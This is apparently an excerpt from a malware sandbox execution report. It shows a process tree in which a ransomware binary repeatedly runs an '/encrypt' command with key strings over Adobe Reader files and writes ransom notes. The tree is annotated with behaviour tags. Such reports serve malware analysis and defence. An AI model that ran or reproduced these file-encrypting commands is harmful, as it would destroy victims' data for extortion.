C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4232
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6992
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:4588
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:4676
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6580
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6420
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:5776
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2680
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:5880
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:3292
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:3968
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:5400
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6684
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6964
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:2936
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:6328
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:2400
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:7112
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif.id-DA208E5B.[[email protected]].gamma"5⤵
- Suspicious use of SetWindowsHookEx
PID:2632
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#Decrypt_Files_ReadMe#.rtf.gif"5⤵
- Suspicious use of SetWindowsHookEx
PID:4540
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\PmK9LCHm-9WRFYrHO.[[email protected]].gif"5⤵
- Suspicious use of SetWindowsHookEx
PID:6772
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Restore-My-Files.txt"5⤵
- Suspicious use of SetWindowsHookEx
PID:6520
-
-
